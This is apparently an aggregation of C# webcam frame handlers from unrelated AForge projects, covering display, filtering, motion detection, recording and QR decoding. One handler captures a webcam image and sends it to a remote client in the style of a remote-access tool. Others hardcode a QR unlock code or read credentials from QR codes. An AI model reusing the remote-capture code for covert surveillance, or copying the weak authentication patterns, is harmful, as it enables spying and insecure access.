                new EuclideanColorFiltering(new AForge.Imaging.RGB((byte)Red, (byte)Green, (byte)Blue), Radius).ApplyInPlace(bitmap);
            }
            if (Grayscaled)
            {
                using (var grayscaledBitmap = Grayscale.CommonAlgorithms.BT709.Apply(bitmap))
                {
                    bi = grayscaledBitmap.ToBitmapImage();
                }
            }
            else if (Thresholded)
            {
                using (var grayscaledBitmap = Grayscale.CommonAlgorithms.BT709.Apply(bitmap))
                using (var thresholdedBitmap = new Threshold(Threshold).Apply(grayscaledBitmap))
                {
                    if (Inverted)
                    {
                        new Invert().ApplyInPlace(thresholdedBitmap);
                    }
                    bi = thresholdedBitmap.ToBitmapImage();
                }
            }
            else // original
            {
                var corners = FindCorners(bitmap);
                if (corners.Any())
                {
                    PaintCorners(corners, bitmap);
                }
                bi = bitmap.ToBitmapImage();
            }
        }
        bi.Freeze(); // avoid cross-thread operations and prevent leaks
        Dispatcher.BeginInvoke(new ThreadStart(delegate { videoPlayer.Source = bi; }));
    }
    catch (Exception exc)
    {
        MessageBox.Show("Error on _videoSource_NewFrame:\n" + exc.Message, "Error", MessageBoxButton.OK, MessageBoxImage.Error);
        StopCamera();
    }
}
private void OnNewFrame(object sender, NewFrameEventArgs eventArgs)
{
    if (DrawCursor)
    {
        using (var g = Graphics.FromImage(eventArgs.Frame))
        {
            Win32Declares.MouseCursor.CURSORINFO pci;
            pci.cbSize = Marshal.SizeOf(typeof(Win32Declares.MouseCursor.CURSORINFO));
            if (Win32Declares.MouseCursor.GetCursorInfo(out pci))
            {
                if (pci.flags == Win32Declares.MouseCursor.CURSOR_SHOWING)
                {
                    Win32Declares.MouseCursor.DrawIcon(g.GetHdc(), pci.ptScreenPos.x, pci.ptScreenPos.y, pci.hCursor);
                    g.ReleaseHdc();
                }
            }
        }
    }
}
private static void video_NewFrame(object sender, NewFrameEventArgs eventArgs)
{
    // get new frame
    Bitmap bitmap = eventArgs.Frame;
    if (detector.ProcessFrame(bitmap) > 0.05)
    {
        imageCount++;
        string filename = "c:\\temp\\" + DateTime.UtcNow.ToFileTimeUtc() + ".png";
        bitmap.Save(filename, ImageFormat.Png);
        Trace.WriteLine(string.Format("Image saved - {0}", imageCount));
    }
}
private void cam_NewFrame(object sender, NewFrameEventArgs eventArgs)
{
    try
    {
        Bitmap bit = (Bitmap)eventArgs.Frame.Clone(); // get a copy of the Bitmap from the VideoCaptureDevice
        if (!this.isResolutionSet)
        {
            // This runs once to set the resolution for the VideoRecorder.
            this.imgWidth = bit.Width;
            this.imgHeight = bit.Height;
            this.isResolutionSet = true;
        }
        this.Display.Image = (Bitmap)bit.Clone(); // display the current frame on the main form
        if (!this.motionDetected)
        {
            // If motion detection is enabled and no motion was detected previously...
            Bitmap bit2 = (Bitmap)bit.Clone(); // clone the bits from the current frame
            if (md.ProcessFrame(bit2) > 0.001) // feed the bits to the motion detector
            {
                if (this.calibrateAndResume > 3)
                {
                    Thread th = new Thread(MotionReaction);
                    th.Start(); // start the motion reaction thread
                }
                else
                    this.calibrateAndResume++;
            }
        }
        if (IsRecording)
        {
            // If recording is enabled, enqueue the current frame to be encoded to a video file.
            Graphics gr = Graphics.FromImage(bit);
            Pen p = new Pen(Color.Red);
            p.Width = 5.0f;
            using (Font myFont = new Font("Tahoma", 10, FontStyle.Bold))
            {
                gr.DrawString(DateTime.Now.ToString(), myFont, Brushes.Red, new Point(2, 2));
            }
            frames.Enqueue((Bitmap)bit.Clone());
        }
    }
    catch (InvalidOperationException ex)
    {
    }
}
private void Sec_Click(object sender, AForge.Video.NewFrameEventArgs eventArgs)
{
    Bitmap image = (Bitmap)eventArgs.Frame.Clone();
    Bitmap image1 = (Bitmap)eventArgs.Frame.Clone();
    pictureBox1.Image = image;
    Sec.Enabled = true;
    if (true)
    {
        AForge.Imaging.Filters.EuclideanColorFiltering filter = new AForge.Imaging.Filters.EuclideanColorFiltering();
        filter.CenterColor = new AForge.Imaging.RGB(Color.FromArgb(215, 0, 0));
        filter.Radius = 100;
        filter.ApplyInPlace(image1);
        nesnebul(image1);
    }
}
void videoSource_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs)
{
    Bitmap bmp = (Bitmap)eventArgs.Frame.Clone();
    string fullPath = path;
    if (!Directory.Exists(fullPath))
    {
        Directory.CreateDirectory(fullPath);
    }
    string img = fullPath + DateTime.Now.ToString("yyyyMMdd hhmmss") + ".jpg";
    images.Add(img);
    bmp.Save(img);
    // Without unsubscribing here, the camera would keep taking pictures on every frame.
    videoSource.NewFrame -= new NewFrameEventHandler(videoSource_NewFrame);
}
private static void FinalVideo_NewFrame(object sender, NewFrameEventArgs e)
{
    if (!WebcamStarted)
        FinalVideo.Stop();
    if (NeedsCapture)
    {
        var image = (Bitmap)e.Frame.Clone();
        using (var stream = new MemoryStream())
        {
            image.Save(stream, ImageFormat.Bmp);
            new GetWebcamResponse(stream.ToArray(), Webcam).Execute(Client);
            stream.Close();
        }
        NeedsCapture = false;
    }
}
void videoSource_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs)
{
    //Cast the frame as Bitmap object and don't forget to use ".Clone()" otherwise
    //you'll probably get access violation exceptions
    //pictureBoxVideo.BackgroundImage = (Bitmap)eventArgs.Frame.Clone();
    Bitmap barcodeBitmap = (Bitmap)eventArgs.Frame.Clone();
    if (ExtractQRCodeMessageFromImage(barcodeBitmap) == "yJz1X")
    {
        if (!System.IO.File.Exists("C:\\Users\\joach\\OVERRIDE"))
        {
            approved = true;
            Exit();
        }
    }
}
private void newFrameEvent(object sender, NewFrameEventArgs eventArgs)
{
    DateTime currentTime = DateTime.Now;
    fps = 1 / (currentTime - lastFrameDateTime).TotalSeconds;
    if (currentTime - startTime > TimeSpan.FromHours(2))
    {
        recorder.Close();
        startRecord(path, (int)fps);
    }
    Graphics graphics = Graphics.FromImage(eventArgs.Frame);
    // "MM" (month) rather than "mm" (minutes) in the date part of the format string.
    TextRenderer.DrawText(graphics, currentTime.ToString("dd/MM/yyyy HH:mm:ss"), font, new Point(5, 5), Color.White, Color.Black);
    if (recorder != null)
    {
        recorder.AddFrame(eventArgs.Frame);
    }
}
private void video_NewFrame(object sender, NewFrameEventArgs eventArgs)
{
    Cursor.Current = Cursors.WaitCursor;
    // get new frame
    bitmap = eventArgs.Frame;
    bitmap.Save(ConfigurationSettings.AppSettings["SaveImageLocation"]);
    StopVideo(videoSource);
    // process the frame
    byte[] data = File.ReadAllBytes(ConfigurationSettings.AppSettings["SaveImageLocation"]);
    // train on the captured image
    FaceRecoginition.FaceRecognition.TrainAlbum(Name, emailID, data);
    Cursor.Current = Cursors.Default;
}
private void video_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs)
{
    try
    {
        BitmapImage bi;
        using (var bitmap = (Bitmap)eventArgs.Frame.Clone())
        {
            bi = bitmap.ToBitmapImage();
        }
        bi.Freeze(); // avoid cross-thread operations and prevent leaks
        Dispatcher.BeginInvoke(new ThreadStart(delegate { imgMem.Source = bi; }));
    }
    catch (Exception exc)
    {
        MessageBox.Show("Error on _videoSource_NewFrame:\n" + exc.Message, "Error", MessageBoxButton.OK, MessageBoxImage.Error);
        StopCamera();
    }
}
void tempSource_NewFrame(object sender, NewFrameEventArgs eventArgs)
{
    if (connected)
    {
        byte[] image = Bitmap2JpegArray(eventArgs.Frame);
        frameNum++;
        byte[] header = Encoding.UTF8.GetBytes(paddedNum(frameNum));
        byte[] toSend = new byte[header.Length + image.Length];
        header.CopyTo(toSend, 0);
        image.CopyTo(toSend, header.Length);
        Console.WriteLine("LENGTH: " + toSend.Length);
        uclient.Send(toSend, toSend.Length);
    }
}
private void video_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs)
{
    eventArgs.Frame.RotateFlip(RotateFlipType.RotateNoneFlipX);
    Bitmap bmp = (Bitmap)eventArgs.Frame.Clone();
    if (QRLocked == false)
    {
        BarcodeReader reader = new BarcodeReader();
        var result = reader.Decode(bmp);
        if (result != null)
        {
            this.txtBarcode.Dispatcher.BeginInvoke(new Action(delegate()
            {
                //txtBarcode.Text = result.ToString();
                QRLocked = false;
                Load_Msgbox(result.ToString());
                QRLocked = true;
                RefreshTimer();
            }));
        }
    }
    try
    {
        using (var bitmap = (Bitmap)eventArgs.Frame.Clone())
        {
            if (Original)
            {
                bi = bitmap.ToBitmapImage();
            }
        }
        bi.Freeze(); // avoid cross-thread operations and prevent leaks
        Dispatcher.BeginInvoke(new ThreadStart(delegate { videoPlayer.Source = bi; }));
    }
    catch (Exception exc)
    {
        MessageBox.Show("Error on _videoSource_NewFrame:\n" + exc.Message, "Error", MessageBoxButton.OK, MessageBoxImage.Error);
        StopCamera();
    }
}
private void videoCaptureDevice_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs)
{
    Bitmap bitmap = (Bitmap)eventArgs.Frame.Clone();
    BarcodeReader reader = new BarcodeReader();
    var result = reader.Decode(bitmap);
    if (result != null)
    {
        txtPassword.Invoke(new MethodInvoker(delegate()
        {
            string rs = result.ToString();
            int user = rs.IndexOf(' ');
            int pass = rs.LastIndexOf(' ');
            txtUserName.Text = rs.Substring(0, user);
            txtPassword.Text = rs.Substring(pass + 1);
        }));
    }
    picBarCode.Image = bitmap;
}
void videoSource_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs)
{
    //Cast the frame as Bitmap object and don't forget to use ".Clone()" otherwise
    //you'll probably get access violation exceptions
    bmpImage = (Bitmap)eventArgs.Frame.Clone();
    if (bRecording == true && writer.IsOpen == true)
    {
        if (startTime == DateTime.MinValue)
        {
            startTime = DateTime.Now;
        }
        try
        {
            writer.WriteVideoFrame(bmpImage, DateTime.Now - startTime);
        }
        catch
        {
        }
    }
    pictureBoxVideo.BackgroundImage = bmpImage;
}
private void Video_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs)
{
    try
    {
        Bitmap img = (Bitmap)eventArgs.Frame.Clone();
        if (printTimeStamp)
        {
            img = CameraHelper.Stamp(img, DateTime.Now, "MM/dd/yyyy HH:mm:ss");
        }
        MemoryStream ms = new MemoryStream();
        {
            img.Save(ms, ImageFormat.Bmp);
            ms.Seek(0, SeekOrigin.Begin);
            BitmapImage bitmapImage = new BitmapImage();
            bitmapImage.BeginInit();
            bitmapImage.StreamSource = ms;
            bitmapImage.EndInit();
            bitmapImage.Freeze();
            Dispatcher.BeginInvoke(new ThreadStart(delegate { imgVideoFrameHolder.Source = bitmapImage; }));
            if (_videoCaptureDevice.IsRunning && !_isPreviewMode)
            {
                long currentTick = DateTime.Now.Ticks;
                StartTick = StartTick ?? currentTick;
                var frameOffset = new TimeSpan(currentTick - StartTick.Value);
                double elapsedTimeInSeconds = _stopwatch.ElapsedTicks / (double)Stopwatch.Frequency;
                double timeBetweenFramesInSeconds = 1.0 / 25;
                if (elapsedTimeInSeconds >= timeBetweenFramesInSeconds)
                {
                    _stopwatch.Restart();
                    _fileWriter.WriteVideoFrame(img, frameOffset);
                }
            }
        }
    }
    catch (Exception ex)
    {
        ErrorLogger.LogError(null, ex.Message, false, false);
    }
}
private void OnNewFrame(
    ServerController controller,
    IMessageRouterResults output,
    AForge.Video.NewFrameEventArgs eventargs)
{
    using (var bitmap = eventargs.Frame)
    {
        var result = controller.Model.MovementDetection.Process(bitmap);
        if (result != null)
        {
            output.SendBinary(new ServerMessage(
                controller.Model.Settings.CameraConnection.Reference,
                "Movement detection",
                result,
                ServerMessageImportance.Secutiry));
        }
    }
}
private void VideoStream_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs)
{
    Bitmap FrameData = new Bitmap(eventArgs.Frame);
    Bitmap clone = (Bitmap)FrameData.Clone();
    pictureBox1.Image = FrameData;
    // If the "stop recording" button is enabled, a recording is in progress.
    if (BtnArreterEnregistrer.Enabled)
    {
        // Add the new image to the final video.
        if (fileWriter == null)
        {
            fileWriter = new VideoFileWriter();
            fileWriter.Open("myfile.avi", pictureBox1.Image.Width, pictureBox1.Image.Height, 25, VideoCodec.MPEG4, 1000000);
        }
        fileWriter.WriteVideoFrame(clone);
        clone.Dispose();
    }
}
void OnNewFrameColor(object sender, AForge.Video.NewFrameEventArgs eventArgs)
{
    if (colorPendingForSave)
    {
        bitmapColorForSave = (Bitmap)eventArgs.Frame.Clone();
        bitmapColorForSave = bitmapColorForSave.ToGrayscale();
        //bitmapColorForSave.Palette = ImageExtensions.GrayScalePalette;
        //bitmapColorForSave.ConvertPixelFormat(System.Drawing.Imaging.PixelFormat.Format8bppIndexed);
        colorPendingForSave = false;
        return;
    }
    //bitmapColor = (Bitmap)eventArgs.Frame;
    switch (this.DisplayType)
    {
        case DisplayType.Color:
        {
            bitmapColor = (Bitmap)eventArgs.Frame.Clone();
            this.colorFrameSize = bitmapColor.Size;
            this.pictureBoxColor.Image = bitmapColor;
            break;
        }
        case DisplayType.Depth:
        {
            break;
        }
        case DisplayType.IR:
        {
            break;
        }
        case DisplayType.OpenGL:
        {
            break;
        }
    }
}